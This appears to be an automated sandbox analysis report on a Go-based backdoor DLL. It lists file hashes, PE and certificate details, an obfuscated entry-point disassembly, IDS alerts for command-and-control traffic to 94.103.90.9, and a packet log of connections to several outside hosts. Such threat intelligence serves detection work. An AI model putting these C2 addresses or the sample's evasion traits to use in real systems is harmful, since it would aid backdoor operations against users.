        VTSL1-ASRUSecuriteInfo.com.Win32.Malware-gen.26009.9463.exeGet hashmaliciousGO BackdoorBrowse
        • 91.142.74.28
        Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
        • 91.142.74.28
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.73.198
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28
        file.dllGet hashmaliciousUnknownBrowse
        • 91.142.74.28
        PZjMIa3MvC.exeGet hashmaliciousGO BackdoorBrowse
        • 91.142.73.198
        TELERU-ASRUSecuriteInfo.com.Win32.Malware-gen.26009.9463.exeGet hashmaliciousGO BackdoorBrowse
        • 77.238.224.56
        QTmGYKK6SL.exeGet hashmaliciousUnknownBrowse
        • 77.238.224.125
        Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        file.dllGet hashmaliciousUnknownBrowse
        • 77.238.224.56
        VDSINA-ASRUSecuriteInfo.com.Win32.Malware-gen.26009.9463.exeGet hashmaliciousGO BackdoorBrowse
        • 195.2.70.38
        mips.elfGet hashmaliciousUnknownBrowse
        • 94.103.91.233
        Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
        • 195.2.70.38
        BFDFC7BDB3890683E8D3B5F3D9CAE5048DE3CBEDEBF223E4B9B732B096917BEB.exeGet hashmaliciousBdaejec, Panda Stealer, Phoenix StealerBrowse
        • 95.142.46.35
        kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
        • 195.2.76.207
        GN03tfEgsB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 178.208.86.27
        file.dllGet hashmaliciousUnknownBrowse
        • 62.113.116.83
        file.dllGet hashmaliciousUnknownBrowse
        • 195.2.70.38
        file.dllGet hashmaliciousUnknownBrowse
        • 195.2.70.38
        No context
        No context
        Process:C:\Windows\SysWOW64\rundll32.exe
        File Type:data
        Category:dropped
        Size (bytes):408
        Entropy (8bit):6.258258296408273
        Encrypted:false
        SSDEEP:6:LyMGXUN9cIkx3EnVMaP4/lR5+PBZu6jUkl3Lfll/FnaakdFgRDxa4Q:LyW2hy+aQ/f5+nDginaPoIJ
        MD5:05C73EE3A3D6540D8703EC6609C3989B
        SHA1:7C893E974E3B02DB59255DD1A37C352C6C0E47B8
        SHA-256:6F81160426E38E892426333BE9F683242FB4C0EC3BA1C84FA5CA2F623646DA77
        SHA-512:CD8902F3D642E6E1BBD2F4B286F80611EFA3638E7D55651F76ABD379E5F45CCAD98597BF8D354FE336850339CFC59B32F6E6C3EB668546606308BCBED2B657B2
        Malicious:false
        Reputation:low
        Preview:..!P.W.Y......=!S.V A).RL\(VX6"#WW8"V5..GV..\>.PM.95^_+.^.Z.M...ZT$(V7P^OX._.&"*...=.^....!(T.+.L'].F>,.W*..R*..G)-._...W.V.[.(.@.Z*T.:.]2;.@U_^Q7=5Q.T.BU.*.>.W.5.\....."..SRT.A,""L.V?^ .VY/%.M-.3[)5:]%.3[..>G.06\^..Q._?]1&8@<].V#[._./(B2 ..].P.....2#+..[+S.Z!A" QL.=5^ .7Y.Q.M7YS[S4.].3S[*<>G?..\.:.QW.QP..[@...U.(SZ)PYB.-......W)+..9,.._3S=3.A_..L?#.^=/&Y(].M8;.[7"$].<.[V./G.9%\.3.V...Y4[.@1..R. ![34.]4^7
        File type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Entropy (8bit):7.902846676225024
        TrID:
        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
        • Generic Win/DOS Executable (2004/3) 0.20%
        • DOS Executable Generic (2002/1) 0.20%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
        File size:15'196'072 bytes
        MD5:ff432e4003e9d7135a97bd4dc0445dc3
        SHA1:41530cb367ca6b69378179b4bba91deaf7d3a342
        SHA256:03495c3e0d041d6c6c1949cf6cfabea9b3d4308fee9cbf85754bb00b434d3778
        SHA512:adfa35738774d096bcbe5891ed51bdd813d797f828a0c90748a5f6cb82b7a8a5a82656843d2387ed906bbaee6dec24b4a3f5ec910a614c728002a9d798480f27
        SSDEEP:393216:fRdW64cosTowwMzcG5FU90WGqNyW8O9hHZUSStMbZlna4:T6gozccuLoNyW8evUSs2
        TLSH:7DE633DA3ECF00E6E68119F4DB1717D717F3955A89C688382ACD3945A0A0FB7106F8E6
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...(..N..v...b...$........N...,l.........................p............@... .........................a..
        Icon Hash:7ae282899bbab082
        Entrypoint:0x6db924fd
        Entrypoint Section:TUaYW
        Digitally signed:true
        Imagebase:0x6c2c0000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
        TLS Callbacks:0x6db7a85d, 0x6c7abd60, 0x6c7abd10
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:1
        File Version Major:6
        File Version Minor:1
        Subsystem Version Major:6
        Subsystem Version Minor:1
        Import Hash:6c871eb5afcc648e749d578ab8277277
        Signature Valid:false
        Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
        Signature Validation Error:The digital signature of the object did not verify
        Error Number:-2146869232
        Not Before, Not After
        • 26/10/2021 17:14:19 26/10/2024 17:14:19
        Subject Chain
        • E=support@electronic.us, CN="Electronic Team, Inc.", O="Electronic Team, Inc.", STREET=901 N Pitt St Ste 101, L=Alexandria, S=Virginia, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Virginia, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=08345597, OID.2.5.4.15=Private Organization
        Version:3
        Thumbprint MD5:CC3D074101D5D8042D1F46EBFE30DEB6
        Thumbprint SHA-1:E98084272092F2202AF66578B6080FD1FFF73E6A
        Thumbprint SHA-256:9598F039F33B2F8F962F76838DE0B6CCDAA1D6DBA0034498FB1CA5DBCCC23F7E
        Serial:3BF56A3A410BD027F7F4CDCB
        Instruction
        push ebx
        push C71FF0ACh
        pushfd
        mov ebx, dword ptr [esp+04h]
        add bl, byte ptr [esp+ebx+38E00F59h]
        mov byte ptr [esp+ebx*2+71C01ECCh], FFFFFF80h
        seto bl
        shr ebx, 22h
        cmove ebx, dword ptr [esp+04h]
        mov ebx, dword ptr [esp+08h]
        mov dword ptr [esp+08h], 9664119Fh
        push dword ptr [esp+00h]
        popfd
        lea esp, dword ptr [esp+08h]
        call 00007FC2C809363Bh
        dec esi
        mov dword ptr [ebx+esi-01EE6FE8h], edx
        inc ecx
        bt ebp, FFFFFF9Fh
        inc cx
        rol edi, FFFFFFEFh
        inc esp
        xchg dh, ah
        dec esp
        lea edi, dword ptr [esp+ebx-01EE6F7Ch]
        dec ecx
        mov esi, dword ptr [edi+ebx*2-03DCDFB8h]
        dec eax
        bts edx, ecx
        dec eax
        xadd edx, ebx
        push ebp
        dec esp
        mov esp, esi
        jng 00007FC2C882FC1Ch
        call 00007FC2C7ED4A69h
        inc ecx
        mov ebp, BB944C2Ah
        dec ebp
        mov ebp, dword ptr [esi]
        inc ecx
        mov edx, 86AD04ACh
        dec ebp
        mov edi, dword ptr [esi+08h]
        inc ebp
        movzx ecx, dl
        dec edx
        lea ebp, dword ptr [C5B6758Dh+ecx*8]
        inc ecx
        inc cl
        dec ebp
        add ebp, edi
        mov ebx, C08F0A18h
        dec ebp
        mov edx, ebp
        inc eax
        movzx edx, ch
        movsx eax, dx
        inc ebx
        mov esi, dword ptr [esi+ecx*8-00000558h]
        and bl, 00000028h
        inc ebx
        mov dword ptr [edx+ecx*2-0000015Ah], esi
        dec edi
        mov ecx, dword ptr [eax+eax+00000000h]
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0xf61bfc0x61TUaYW
        IMAGE_DIRECTORY_ENTRY_IMPORT0x1188d540x3cTUaYW
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0xe782000x5da8f^Ycc
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1db60000x4f0SZVZY
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x1a86be40x18TUaYW
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0xf3d0000x10cUfXW
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        becb`0x10000x4ec4a80x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        [e[fe0x4ee0000x2cf6c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        ^^STU0x51b0000x2ae2d40x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        bY^eU0x7ca0000x360900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        a_SfU0x8010000x610x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        Y\d^_0x8020000x9c00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        T]^[_0x8030000x2c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        eZ]e\0x8040000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        f^Ycc0x8050000x737ca70x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        cUfXW0xf3d0000x2c0x200b7d30e9ed02236d72d9c14b9fe372f23False0.044921875data0.15517757530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        TUaYW0xf3e0000xe774800xe776006a543533a21a260f56802b83396d908aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        SZVZY0x1db60000x4f00x60073dc1c0d98e44233a766a4be4bfd4864False0.4524739583333333data3.9980226791839693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        DLLImport
        KERNEL32.dllAddVectoredExceptionHandler
        msvcrt.dll__mb_cur_max
        NameOrdinalAddress
        MainFunc10x6c7a6460
        _cgo_dummy_export20x6cabf64c

        Download Network PCAP: filteredfull

        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
        2024-08-09T19:28:49.448134+0200TCP2855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M114973926395192.168.2.494.103.90.9
        2024-08-09T19:28:49.429828+0200TCP2855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21263954973994.103.90.9192.168.2.4
        2024-08-09T19:29:19.090843+0200TCP2855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11263954973994.103.90.9192.168.2.4
        2024-08-09T19:29:18.867934+0200TCP2855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M214973926395192.168.2.494.103.90.9
        • Total Packets: 139
        • 26395 undefined
        • 80 (HTTP)
        TimestampSource PortDest PortSource IPDest IP
        Aug 9, 2024 19:28:46.855180979 CEST4973680192.168.2.4195.2.70.38
        Aug 9, 2024 19:28:46.861253977 CEST8049736195.2.70.38192.168.2.4
        Aug 9, 2024 19:28:46.861398935 CEST4973680192.168.2.4195.2.70.38
        Aug 9, 2024 19:28:46.922494888 CEST4973680192.168.2.4195.2.70.38
        Aug 9, 2024 19:28:46.932054043 CEST8049736195.2.70.38192.168.2.4
        Aug 9, 2024 19:28:47.557013988 CEST8049736195.2.70.38192.168.2.4
        Aug 9, 2024 19:28:47.611175060 CEST4973780192.168.2.491.142.74.28
        Aug 9, 2024 19:28:47.616180897 CEST804973791.142.74.28192.168.2.4
        Aug 9, 2024 19:28:47.616312027 CEST4973780192.168.2.491.142.74.28
        Aug 9, 2024 19:28:47.706377029 CEST4973780192.168.2.491.142.74.28
        Aug 9, 2024 19:28:47.711704016 CEST804973791.142.74.28192.168.2.4
        Aug 9, 2024 19:28:47.770724058 CEST8049736195.2.70.38192.168.2.4
        Aug 9, 2024 19:28:47.770808935 CEST4973680192.168.2.4195.2.70.38
        Aug 9, 2024 19:28:48.350313902 CEST804973791.142.74.28192.168.2.4
        Aug 9, 2024 19:28:48.394496918 CEST4973780192.168.2.491.142.74.28
        Aug 9, 2024 19:28:48.756526947 CEST4973680192.168.2.4195.2.70.38
        Aug 9, 2024 19:28:48.763128042 CEST8049736195.2.70.38192.168.2.4
        Aug 9, 2024 19:28:48.763267994 CEST4973680192.168.2.4195.2.70.38
        Aug 9, 2024 19:28:48.797468901 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:28:48.802651882 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:28:48.802725077 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:28:49.429827929 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:28:49.448133945 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:28:49.453099966 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:04.478336096 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:04.483653069 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:09.428085089 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:09.432033062 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:09.439517975 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:18.494987965 CEST4973780192.168.2.491.142.74.28
        Aug 9, 2024 19:29:18.500282049 CEST804973791.142.74.28192.168.2.4
        Aug 9, 2024 19:29:18.867933989 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:18.872889042 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:19.090842962 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:19.183721066 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:29.659264088 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:29.662086010 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:29.667146921 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:44.678528070 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:44.684020996 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:48.694083929 CEST4973780192.168.2.491.142.74.28
        Aug 9, 2024 19:29:48.847223043 CEST804973791.142.74.28192.168.2.4
        Aug 9, 2024 19:29:49.116229057 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:49.121613026 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:49.340087891 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:49.382601976 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:49.886349916 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:29:49.899842024 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:29:49.904906988 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:04.969355106 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:04.974642992 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:10.700602055 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:10.700959921 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:10.701118946 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:10.701940060 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:10.702054977 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:10.704436064 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:10.710345030 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:18.427011013 CEST4973780192.168.2.491.142.74.28
        Aug 9, 2024 19:30:18.432965994 CEST804973791.142.74.28192.168.2.4
        Aug 9, 2024 19:30:18.433089972 CEST4973780192.168.2.491.142.74.28
        Aug 9, 2024 19:30:19.408080101 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:19.416441917 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:19.642014027 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:19.784327030 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:30.930916071 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:30.940964937 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:30.945993900 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:46.082102060 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:46.087297916 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:49.668631077 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:49.674179077 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:49.674562931 CEST4974380192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:49.679639101 CEST8049743195.2.70.38192.168.2.4
        Aug 9, 2024 19:30:49.679718018 CEST4974380192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:49.683842897 CEST4974380192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:49.688947916 CEST8049743195.2.70.38192.168.2.4
        Aug 9, 2024 19:30:49.767260075 CEST4974480192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:49.773288965 CEST8049744195.2.70.38192.168.2.4
        Aug 9, 2024 19:30:49.773365021 CEST4974480192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:49.774321079 CEST4974480192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:49.779660940 CEST8049744195.2.70.38192.168.2.4
        Aug 9, 2024 19:30:49.892035007 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:49.971206903 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:50.384175062 CEST8049743195.2.70.38192.168.2.4
        Aug 9, 2024 19:30:50.384959936 CEST4974580192.168.2.491.142.74.28
        Aug 9, 2024 19:30:50.390227079 CEST804974591.142.74.28192.168.2.4
        Aug 9, 2024 19:30:50.390374899 CEST4974580192.168.2.491.142.74.28
        Aug 9, 2024 19:30:50.391410112 CEST4974580192.168.2.491.142.74.28
        Aug 9, 2024 19:30:50.396806002 CEST804974591.142.74.28192.168.2.4
        Aug 9, 2024 19:30:50.469809055 CEST4974380192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:50.488085032 CEST8049744195.2.70.38192.168.2.4
        Aug 9, 2024 19:30:50.488970041 CEST4974680192.168.2.491.142.74.28
        Aug 9, 2024 19:30:50.494009972 CEST804974691.142.74.28192.168.2.4
        Aug 9, 2024 19:30:50.494080067 CEST4974680192.168.2.491.142.74.28
        Aug 9, 2024 19:30:50.495434999 CEST4974680192.168.2.491.142.74.28
        Aug 9, 2024 19:30:50.500657082 CEST804974691.142.74.28192.168.2.4
        Aug 9, 2024 19:30:50.573863983 CEST4974480192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:51.081151962 CEST804974591.142.74.28192.168.2.4
        Aug 9, 2024 19:30:51.081978083 CEST4974780192.168.2.477.238.224.56
        Aug 9, 2024 19:30:51.087675095 CEST804974777.238.224.56192.168.2.4
        Aug 9, 2024 19:30:51.087748051 CEST4974780192.168.2.477.238.224.56
        Aug 9, 2024 19:30:51.088288069 CEST4974780192.168.2.477.238.224.56
        Aug 9, 2024 19:30:51.093379021 CEST804974777.238.224.56192.168.2.4
        Aug 9, 2024 19:30:51.164448023 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:51.164659023 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:30:51.169985056 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:30:51.180802107 CEST4974580192.168.2.491.142.74.28
        Aug 9, 2024 19:30:51.205766916 CEST804974691.142.74.28192.168.2.4
        Aug 9, 2024 19:30:51.206717968 CEST4974880192.168.2.477.238.224.56
        Aug 9, 2024 19:30:51.213422060 CEST804974877.238.224.56192.168.2.4
        Aug 9, 2024 19:30:51.213505030 CEST4974880192.168.2.477.238.224.56
        Aug 9, 2024 19:30:51.213885069 CEST4974880192.168.2.477.238.224.56
        Aug 9, 2024 19:30:51.219837904 CEST804974877.238.224.56192.168.2.4
        Aug 9, 2024 19:30:51.370378017 CEST4974680192.168.2.491.142.74.28
        Aug 9, 2024 19:30:51.686045885 CEST804974777.238.224.56192.168.2.4
        Aug 9, 2024 19:30:51.687119007 CEST4974980192.168.2.477.238.229.63
        Aug 9, 2024 19:30:51.692137003 CEST804974977.238.229.63192.168.2.4
        Aug 9, 2024 19:30:51.692239046 CEST4974980192.168.2.477.238.229.63
        Aug 9, 2024 19:30:51.693206072 CEST4974980192.168.2.477.238.229.63
        Aug 9, 2024 19:30:51.698168993 CEST804974977.238.229.63192.168.2.4
        Aug 9, 2024 19:30:51.814228058 CEST804974877.238.224.56192.168.2.4
        Aug 9, 2024 19:30:51.815627098 CEST4975080192.168.2.477.238.229.63
        Aug 9, 2024 19:30:51.821880102 CEST804975077.238.229.63192.168.2.4
        Aug 9, 2024 19:30:51.822027922 CEST4975080192.168.2.477.238.229.63
        Aug 9, 2024 19:30:51.822561026 CEST4975080192.168.2.477.238.229.63
        Aug 9, 2024 19:30:51.827485085 CEST804975077.238.229.63192.168.2.4
        Aug 9, 2024 19:30:51.854264021 CEST4974880192.168.2.477.238.224.56
        Aug 9, 2024 19:30:51.869930983 CEST4974780192.168.2.477.238.224.56
        Aug 9, 2024 19:30:52.289711952 CEST804974977.238.229.63192.168.2.4
        Aug 9, 2024 19:30:52.291353941 CEST4975180192.168.2.477.238.250.123
        Aug 9, 2024 19:30:52.297117949 CEST804975177.238.250.123192.168.2.4
        Aug 9, 2024 19:30:52.297281027 CEST4975180192.168.2.477.238.250.123
        Aug 9, 2024 19:30:52.297672987 CEST4975180192.168.2.477.238.250.123
        Aug 9, 2024 19:30:52.303370953 CEST804975177.238.250.123192.168.2.4
        Aug 9, 2024 19:30:52.344990015 CEST4974980192.168.2.477.238.229.63
        Aug 9, 2024 19:30:52.422346115 CEST804975077.238.229.63192.168.2.4
        Aug 9, 2024 19:30:52.424257994 CEST4975280192.168.2.477.238.250.123
        Aug 9, 2024 19:30:52.429434061 CEST804975277.238.250.123192.168.2.4
        Aug 9, 2024 19:30:52.431082964 CEST4975280192.168.2.477.238.250.123
        Aug 9, 2024 19:30:52.432462931 CEST4975280192.168.2.477.238.250.123
        Aug 9, 2024 19:30:52.437336922 CEST804975277.238.250.123192.168.2.4
        Aug 9, 2024 19:30:52.464385986 CEST4975080192.168.2.477.238.229.63
        Aug 9, 2024 19:30:52.919675112 CEST804975177.238.250.123192.168.2.4
        Aug 9, 2024 19:30:52.921325922 CEST4975180192.168.2.477.238.250.123
        Aug 9, 2024 19:30:52.921358109 CEST4974980192.168.2.477.238.229.63
        Aug 9, 2024 19:30:52.921406984 CEST4974780192.168.2.477.238.224.56
        Aug 9, 2024 19:30:52.921442986 CEST4974580192.168.2.491.142.74.28
        Aug 9, 2024 19:30:52.921509027 CEST4974380192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:52.927097082 CEST804975177.238.250.123192.168.2.4
        Aug 9, 2024 19:30:52.928531885 CEST804974977.238.229.63192.168.2.4
        Aug 9, 2024 19:30:52.928546906 CEST804974777.238.224.56192.168.2.4
        Aug 9, 2024 19:30:52.928584099 CEST804974591.142.74.28192.168.2.4
        Aug 9, 2024 19:30:52.928597927 CEST8049743195.2.70.38192.168.2.4
        Aug 9, 2024 19:30:52.928608894 CEST4975180192.168.2.477.238.250.123
        Aug 9, 2024 19:30:52.928631067 CEST4974980192.168.2.477.238.229.63
        Aug 9, 2024 19:30:52.928658962 CEST4974780192.168.2.477.238.224.56
        Aug 9, 2024 19:30:52.928668976 CEST4974580192.168.2.491.142.74.28
        Aug 9, 2024 19:30:52.928685904 CEST4974380192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:53.041307926 CEST804975277.238.250.123192.168.2.4
        Aug 9, 2024 19:30:53.041606903 CEST4975280192.168.2.477.238.250.123
        Aug 9, 2024 19:30:53.041783094 CEST4974680192.168.2.491.142.74.28
        Aug 9, 2024 19:30:53.041821957 CEST4975080192.168.2.477.238.229.63
        Aug 9, 2024 19:30:53.041837931 CEST4974880192.168.2.477.238.224.56
        Aug 9, 2024 19:30:53.041837931 CEST4974480192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:53.055573940 CEST804975277.238.250.123192.168.2.4
        Aug 9, 2024 19:30:53.055661917 CEST4975280192.168.2.477.238.250.123
        Aug 9, 2024 19:30:53.055671930 CEST804974691.142.74.28192.168.2.4
        Aug 9, 2024 19:30:53.055725098 CEST804975077.238.229.63192.168.2.4
        Aug 9, 2024 19:30:53.055773020 CEST804974877.238.224.56192.168.2.4
        Aug 9, 2024 19:30:53.055840969 CEST8049744195.2.70.38192.168.2.4
        Aug 9, 2024 19:30:53.055866957 CEST4974680192.168.2.491.142.74.28
        Aug 9, 2024 19:30:53.055911064 CEST4974880192.168.2.477.238.224.56
        Aug 9, 2024 19:30:53.055954933 CEST4974480192.168.2.4195.2.70.38
        Aug 9, 2024 19:30:53.055982113 CEST4975080192.168.2.477.238.229.63
        Aug 9, 2024 19:31:06.175043106 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:31:06.180545092 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:31:11.401339054 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:31:11.401767969 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:31:11.407228947 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:31:19.887047052 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:31:19.891976118 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:31:20.138149023 CEST263954973994.103.90.9192.168.2.4
        Aug 9, 2024 19:31:20.185807943 CEST4973926395192.168.2.494.103.90.9
        Aug 9, 2024 19:31:22.951154947 CEST4975380192.168.2.4195.2.70.38
        Aug 9, 2024 19:31:22.959491968 CEST8049753195.2.70.38192.168.2.4
        Aug 9, 2024 19:31:22.959647894 CEST4975380192.168.2.4195.2.70.38
        Aug 9, 2024 19:31:22.960441113 CEST4975380192.168.2.4195.2.70.38
        Aug 9, 2024 19:31:22.968409061 CEST8049753195.2.70.38192.168.2.4
        Aug 9, 2024 19:31:23.040538073 CEST4975480192.168.2.4195.2.70.38
        Aug 9, 2024 19:31:23.045526028 CEST8049754195.2.70.38192.168.2.4
        Aug 9, 2024 19:31:23.045630932 CEST4975480192.168.2.4195.2.70.38
        Aug 9, 2024 19:31:23.045965910 CEST4975480192.168.2.4195.2.70.38
        Aug 9, 2024 19:31:23.050779104 CEST8049754195.2.70.38192.168.2.4
        Aug 9, 2024 19:31:23.661927938 CEST8049753195.2.70.38192.168.2.4
        Aug 9, 2024 19:31:23.663783073 CEST4975580192.168.2.491.142.74.28
